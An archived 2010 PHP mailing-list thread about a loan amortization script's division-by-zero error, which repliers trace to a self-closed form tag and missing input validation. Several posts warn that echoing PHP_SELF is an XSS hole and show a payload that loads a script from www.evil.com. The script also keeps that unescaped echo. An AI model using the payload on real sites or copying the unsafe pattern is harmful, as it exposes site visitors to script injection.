Re: [PHP] Division by 0
Op 3/10/10 11:39 PM, Daniel Egeberg schreef: On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban dmi...@ruban.biz wrote: Hi Jochem, Jochem Maas wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way. Regards, Dmitry No, it is not safe... This won't work: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script But this will: index.php/ onsubmit=evil()script src=http://www.evil.com/evi.js;/script yeah sorry, I was lax and made the query string mistake, the issue stands though as Daniel pointed out. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
I love this place, thank you to everyone that posted, I will make changes to make it safer. Thanks again to everyone. gary Jochem Maas joc...@iamjochem.com wrote in message news:4b98de7e.8020...@iamjochem.com... Op 3/10/10 11:39 PM, Daniel Egeberg schreef: On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban dmi...@ruban.biz wrote: Hi Jochem, Jochem Maas wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way. Regards, Dmitry No, it is not safe... This won't work: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script But this will: index.php/ onsubmit=evil()script src=http://www.evil.com/evi.js;/script yeah sorry, I was lax and made the query string mistake, the issue stands though as Daniel pointed out. __ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __ The message was checked by ESET Smart Security. http://www.eset.com __ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __ The message was checked by ESET Smart Security. http://www.eset.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Division by 0
I have tried and tried, countless times to be removed from this list... still when I go to my deleted items I can see that emails leak through. If there is an administrator who can simply delete me ( simply because I can not seem to do this correctly) I would greatly appreciate it. Thank You! Sincerely, Michael Roberts Executive Recruiter Corporate Staffing Services 150 Monument Road, Suite 510 Bala Cynwyd, PA 19004 P 610-771-1084 F 610-771-0390 E mrobe...@jobscss.com Check out my recent feature article in Professional Surveyor 12/09 edition. http://www.profsurv.com/magazine/article.aspx?i=70379 -Original Message- From: Gary [mailto:gwp...@ptd.net] Sent: Thursday, March 11, 2010 7:51 AM To: php-general@lists.php.net Subject: Re: [PHP] Division by 0 I love this place, thank you to everyone that posted, I will make changes to make it safer. Thanks again to everyone. gary Jochem Maas joc...@iamjochem.com wrote in message news:4b98de7e.8020...@iamjochem.com... Op 3/10/10 11:39 PM, Daniel Egeberg schreef: On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban dmi...@ruban.biz wrote: Hi Jochem, Jochem Maas wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way. Regards, Dmitry No, it is not safe... This won't work: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script But this will: index.php/ onsubmit=evil()script src=http://www.evil.com/evi.js;/script yeah sorry, I was lax and made the query string mistake, the issue stands though as Daniel pointed out. __ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __ The message was checked by ESET Smart Security. http://www.eset.com __ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __ The message was checked by ESET Smart Security. http://www.eset.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
Op 3/11/10 2:44 PM, Mike Roberts schreef: I have tried and tried, countless times to be removed from this list... still when I go to my deleted items I can see that emails leak through. If there is an administrator who can simply delete me ( simply because I can not seem to do this correctly) I would greatly appreciate it. Thank You! no there is not (really!), either search the archives, search php.net look at the bottom of any of the email sent via the list or check the email headers of email sent via the list - any one of those will give you a way out. but that probably is a bit of a technical challenge, so try this: send a blank email to php-general-unsubscr...@lists.php.net using the email account you are subscribed to the list to. all things being equal you should recieve a message saying either that you've been removed or that you need to confirm the removal (which means either replying once more to that message or clicking a link). PS - it's generally considered bad form to reply to someone else's thread rather than send a new message when you're not engaging the current conversation. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
Op 3/10/10 6:23 PM, Joseph Thayne schreef:
Looks to me like you are closing your form before you put anything in
it. Therefore, the loan_amount is not set making the value 0. Follow
the math, and you are dividing by 1-1.
Change this line:
form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form
to:
form action=?php echo $_SERVER['PHP_SELF']; ? method=post
this is a XSS waiting to happen. I can put something like the following in
the request uri:
index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script
with regard to the original problem - some input validation is in order.
(pow($intCalc,$totalPayments) - 1);
if $intCal and $totalPayments are both equal to 1 then either something
is wrong and the calc shouldn't be done or some other calc needs to
be done.
every value being POSTed should be checked that it's been set, and that
it's a valid numeric value (for the numeric fields) ... if anything is
missing show the form again and display an error message without doing
the calculation.
and you should be good to go.
Joseph
Gary wrote:
I have a mortgage amortization script that was working fine,now it
seems to have gone awry. Below is the entire script plus input page.
I am getting an error
Warning: Division by zero in
/home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on
line 47
Which is (pow($intCalc,$totalPayments) - 1);
Frankly I am not even sure the information is being passed to the script.
Anyone see what I am missing?
Gary
div id=onecolCalculate your Loan/div
div id=leftcontent
form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form
table
tr
td style=background-color:#B1D8D8 width=110pxLoan Amount/td
tdinput name=loan_amount type=text size=25 / USD/td
tda href=javascript:void(0); onmouseover=Tip('This is
the amount of money to be loaned.') onmouseout=UnTip()img
src=images/help.png class=noborder//a/td
/tr
tr
td style=background-color:#B1D8D8 width=110pxType of
Loan/td
td
select name=type size=1 id=type
optionInstallment/option
optionBalloon/option
/select/td
tda href=javascript:void(0); onmouseover=Tip('This is the
method of repayment.') onmouseout=UnTip()img
src=images/help.png class=noborder//a/td
/tr
tr
td style=background-color:#B1D8D8 width=100pxTerm of Loan/td
tdinput name=loan_term type=text size=5 /
/selectMonths/td
tda href=javascript:void(0); onmouseover=Tip('This is the
amount of time that the money is loaned for.')
onmouseout=UnTip()img src=images/help.png class=noborder
//a/td
/tr
tr
td style=background-color:#B1D8D8 width=140pxInterest
Rate/td
tdinput name=int_rate type=text size=10 / Per
Annum/tdtda href=javascript:void(0);
onmouseover=Tip('Percentage (%) charged on loan on an annual basis.
br /Please see our FAQs for information on usury rates. br /If no
amount is entered this will be 0%.') onmouseout=UnTip()img
src=images/help.png class=noborder //a/td
/tr
/table
label
input type=submit name=submit id=submit value=submit /
/label
/form
?php
function amortizationTable($paymentNum, $periodicPayment, $balance,
$monthlyInterest) {
$paymentInterest = round($balance * $monthlyInterest,2);
$paymentPrincipal = round($periodicPayment - $paymentInterest,2);
$newBalance = round($balance - $paymentPrincipal,2);
print tr
td$paymentNum/td
td\$.number_format($balance,2)./td
td\$.number_format($periodicPayment,2)./td
td\$.number_format($paymentInterest,2)./td
td\$.number_format($paymentPrincipal,2)./td
/tr;
# If balance not yet zero, recursively call amortizationTable()
if ($newBalance 0) {
$paymentNum++;
amortizationTable($paymentNum, $periodicPayment, $newBalance,
$monthlyInterest);
} else {
exit;
}
} #end amortizationTable()
# Loan balance
$balance =($_POST['loan_amount']);
# Loan interest rate
$interestRate = ($_POST['int_rate']);
# Monthly interest rate
$monthlyInterest = ($interestRate / 12);
# Term length of the loan, in years.
$termLength =($_POST['loan_term']);
# Number of payments per year.
$paymentsPerYear = 12;
# Payment iteration
$paymentNumber =($_POST['loan_term']);
# Perform preliminary calculations
$totalPayments = $termLength * $paymentsPerYear;
$intCalc = 1 + $interestRate / $paymentsPerYear;
$periodicPayment = $balance * pow($intCalc,$totalPayments) *
($intCalc - 1) /
(pow($intCalc,$totalPayments) - 1);
$periodicPayment = round($periodicPayment,2);
# Create table
echo table width='50%' align='center' border='1';
print tr
thPayment
Number/ththBalance/th
Re: [PHP] Division by 0
Joseph
My apologise for not writing sooner to thank you, you were of course
correct. Thanks again.
Gary
Joseph Thayne webad...@thaynefam.org wrote in message
news:4b97e3a2.2030...@thaynefam.org...
Looks to me like you are closing your form before you put anything in it.
Therefore, the loan_amount is not set making the value 0. Follow the
math, and you are dividing by 1-1.
Change this line:
form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form
to:
form action=?php echo $_SERVER['PHP_SELF']; ? method=post
and you should be good to go.
Joseph
Gary wrote:
I have a mortgage amortization script that was working fine,now it seems
to have gone awry. Below is the entire script plus input page. I am
getting an error
Warning: Division by zero in
/home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on
line 47
Which is (pow($intCalc,$totalPayments) - 1);
Frankly I am not even sure the information is being passed to the script.
Anyone see what I am missing?
Gary
div id=onecolCalculate your Loan/div
div id=leftcontent
form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form
table
tr
td style=background-color:#B1D8D8 width=110pxLoan Amount/td
tdinput name=loan_amount type=text size=25 / USD/td
tda href=javascript:void(0); onmouseover=Tip('This is the
amount of money to be loaned.') onmouseout=UnTip()img
src=images/help.png class=noborder//a/td
/tr
tr
td style=background-color:#B1D8D8 width=110pxType of
Loan/td
td
select name=type size=1 id=type
optionInstallment/option
optionBalloon/option
/select/td
tda href=javascript:void(0); onmouseover=Tip('This is the method
of repayment.') onmouseout=UnTip()img src=images/help.png
class=noborder//a/td
/tr
tr
td style=background-color:#B1D8D8 width=100pxTerm of Loan/td
tdinput name=loan_term type=text size=5 /
/selectMonths/td
tda href=javascript:void(0); onmouseover=Tip('This is the amount
of time that the money is loaned for.') onmouseout=UnTip()img
src=images/help.png class=noborder //a/td
/tr
tr
td style=background-color:#B1D8D8 width=140pxInterest
Rate/td
tdinput name=int_rate type=text size=10 / Per
Annum/tdtda href=javascript:void(0); onmouseover=Tip('Percentage
(%) charged on loan on an annual basis. br /Please see our FAQs for
information on usury rates. br /If no amount is entered this will be
0%.') onmouseout=UnTip()img src=images/help.png class=noborder
//a/td
/tr
/table
label
input type=submit name=submit id=submit value=submit /
/label
/form
?php
function amortizationTable($paymentNum, $periodicPayment, $balance,
$monthlyInterest) {
$paymentInterest = round($balance * $monthlyInterest,2);
$paymentPrincipal = round($periodicPayment - $paymentInterest,2);
$newBalance = round($balance - $paymentPrincipal,2);
print tr
td$paymentNum/td
td\$.number_format($balance,2)./td
td\$.number_format($periodicPayment,2)./td
td\$.number_format($paymentInterest,2)./td
td\$.number_format($paymentPrincipal,2)./td
/tr;
# If balance not yet zero, recursively call amortizationTable()
if ($newBalance 0) {
$paymentNum++;
amortizationTable($paymentNum, $periodicPayment, $newBalance,
$monthlyInterest);
} else {
exit;
}
} #end amortizationTable()
# Loan balance
$balance =($_POST['loan_amount']);
# Loan interest rate
$interestRate = ($_POST['int_rate']);
# Monthly interest rate
$monthlyInterest = ($interestRate / 12);
# Term length of the loan, in years.
$termLength =($_POST['loan_term']);
# Number of payments per year.
$paymentsPerYear = 12;
# Payment iteration
$paymentNumber =($_POST['loan_term']);
# Perform preliminary calculations
$totalPayments = $termLength * $paymentsPerYear;
$intCalc = 1 + $interestRate / $paymentsPerYear;
$periodicPayment = $balance * pow($intCalc,$totalPayments) *
($intCalc - 1) /
(pow($intCalc,$totalPayments) - 1);
$periodicPayment = round($periodicPayment,2);
# Create table
echo table width='50%' align='center' border='1';
print tr
thPayment
Number/ththBalance/th
thPayment/ththInterest/ththPrincipal/th
/tr;
# Call recursive function
amortizationTable($paymentNumber, $periodicPayment, $balance,
$monthlyInterest);
# Close table
print /table;
?
/div
__ Information from ESET Smart Security, version of virus
signature database 4932 (20100310) __
The message was checked by ESET Smart Security.
http://www.eset.com
__ Information from ESET Smart Security, version of virus
signature database 4932 (20100310)
Re: [PHP] Division by 0
On Wed, Mar 10, 2010 at 22:27, Jochem Maas joc...@iamjochem.com wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script with regard to the original problem - some input validation is in order. PHP_SELF doesn't contain the query string, so your particular attack wouldn't work. It's still a security issue though. -- Daniel Egeberg -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
Hi Jochem, Jochem Maas wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way. Regards, Dmitry -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban dmi...@ruban.biz wrote: Hi Jochem, Jochem Maas wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way. Regards, Dmitry No, it is not safe... This won't work: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script But this will: index.php/ onsubmit=evil()script src=http://www.evil.com/evi.js;/script -- Daniel Egeberg -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
